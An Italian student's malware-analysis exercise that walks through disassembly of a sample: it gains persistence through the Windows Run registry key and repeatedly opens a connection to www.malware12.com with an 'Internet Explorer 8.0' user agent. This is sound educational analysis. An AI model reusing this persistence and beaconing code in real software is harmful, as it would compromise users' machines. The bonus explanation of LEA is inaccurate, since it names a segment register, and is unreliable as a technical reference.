

## Pratica S11/L1

Rosario Giaimo

Traccia:

Con riferimento agli estratti di un malware reale presenti nelle prossime slide, rispondere alle seguenti domande:

- Descrivere come il malware ottiene la persistenza, evidenziando il codice assembly dove le relative istruzioni e chiamate di funzioni vengono eseguite
- Identificare il client software utilizzato dal malware per la connessione ad Internet
- Identificare l'URL al quale il malware tenta di connettersi ed evidenziare la chiamata di funzione che permette al malware di connettersi ad un URL
- BONUS: qual è il significato e il funzionamento del comando assembly "lea"

Traccia:

```

0040286F  push     2                ; samDesired
00402871  push     eax              ; ulOptions
00402872  push     offset SubKey    ; "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
00402877  push     HKEY_LOCAL_MACHINE ; hKey
0040287C  call     esi              ; RegOpenKeyExW
0040287E  test     eax, eax
00402880  jnz      short loc_4028C5
00402882
00402882  loc_402882:
00402882  lea      ecx, [esp+424h+Data]
00402886  push     ecx              ; lpString
00402887  mov      bl, 1
00402889  call     ds:strlenW
0040288F  lea      edx, [eax+eax+2]
00402893  push     edx              ; cbData
00402894  mov      edx, [esp+428h+hKey]
00402898  lea      eax, [esp+428h+Data]
0040289C  push     eax              ; lpData
0040289D  push     1                ; dwType
0040289F  push     0                ; Reserved
004028A1  lea      ecx, [esp+434h+ValueName]
004028A8  push     ecx              ; lpValueName
004028A9  push     edx              ; hKey
004028AA  call     ds:RegSetValueExW
```

```

Traccia:
.text:00401150 ; .:.....: S U B R O U T I N E :.....:
.text:00401150
.text:00401150
.text:00401150 ; DWORD __stdcall StartAddress(LPVOID)
.text:00401150 StartAddress proc near ; DATA XREF: sub_401040+EC70
.text:00401150     push     esi
.text:00401151     push     edi
.text:00401152     push     0 ; dwFlags
.text:00401154     push     0 ; lpzProxyBypass
.text:00401156     push     0 ; lpzProxy
.text:00401158     push     1 ; dwAccessType
.text:0040115A     push     offset szAgent ; "Internet Explorer 8.0"
.text:0040115F     call     ds:InternetOpenA
.text:00401165     mov      edi, ds:InternetOpenUrlA
.text:00401168     mov      esi, eax
.text:0040116D
.text:0040116D loc_40116D: ; CODE XREF: StartAddress+30j
.text:0040116D     push     0 ; dwContext
.text:0040116F     push     80000000h ; dwFlags
.text:00401174     push     0 ; dwHeadersLength
.text:00401176     push     0 ; lpzHeaders
.text:00401178     push     offset szUrl ; "http://www.malware12.com
.text:0040117D     push     esi ; hInternet
.text:0040117E     call     edi ; InternetOpenUrlA
.text:00401180     jmp      short loc_40116D
.text:00401180 StartAddress endp
.text:00401180

```

## Svolgimento

- **Descrivere come il malware ottiene la persistenza, evidenziando il codice assembly dove le relative istruzioni e chiamate di funzioni vengono eseguite**

Il malware descritto ottiene la persistenza nel sistema sfruttando il registro di Windows. In particolare, inserisce un nuovo valore all'interno della chiave di registro

**Software\\Microsoft\\Windows\\CurrentVersion\\Run.** Questa chiave contiene l'elenco dei programmi che vengono eseguiti automaticamente all'avvio del sistema operativo.

### Fasi dell'attacco:

1. **RegOpenKey:** Il malware utilizza la funzione **RegOpenKey** per aprire la chiave di registro **Software\\Microsoft\\Windows\\CurrentVersion\\Run**. Questa funzione permette al malware di accedere e modificare i valori all'interno della chiave.
2. **RegSetValueEx:** Il malware utilizza la funzione **RegSetValueEx** per inserire il valore preparato all'interno della chiave di registro aperta in precedenza. Questa funzione consente al malware di creare o modificare un valore all'interno della chiave.

- **Identificare il client software utilizzato dal malware per la connessione ad Internet**

Il client utilizzato dal malware per connettersi ad internet è Internet Explorer Versione 8.0

```
push 0 ; lpszProxy
push 1 ; dwAccessType
push offset szAgent ; "Internet Explorer 8.0"
call ds:InternetOpenA
mov edi, ds:InternetOpenUrlA
```

- **Identificare l'URL al quale il malware tenta di connettersi ed evidenziare la chiamata di funzione che permette al malware di connettersi ad un URL**

Il malware tenta di connettersi al sito web **www.malware12.com** utilizzando la funzione **InternetOpenURL**. Questa funzione permette al malware di aprire una connessione web e di recuperare i dati dal sito web specificato.

```
.
push 80000000h ; dwFlags
push 0 ; dwHeadersLength
push 0 ; lpszHeaders
push offset szUrl ; "http://www.malware12.com"
push esi ; hInternet
call edi ; InternetOpenUrlA
jmp short loc_401160
endp
```

- **BONUS: qual è il significato e il funzionamento del comando assembly "lea"**

### **Significato:**

Il comando **LEA** (Load Effective Address) serve per caricare l'indirizzo effettivo di un operando nella base di un registro di segmento. In poche parole, consente di ottenere l'indirizzo di memoria di una variabile o di un'etichetta e di memorizzarlo in un registro.

### **Funzionamento:**

Il comando **LEA** funziona calcolando l'indirizzo effettivo dell'operando specificato e memorizzando nel registro di segmento indicato. L'indirizzo effettivo è l'indirizzo di memoria reale a cui si trova l'operando.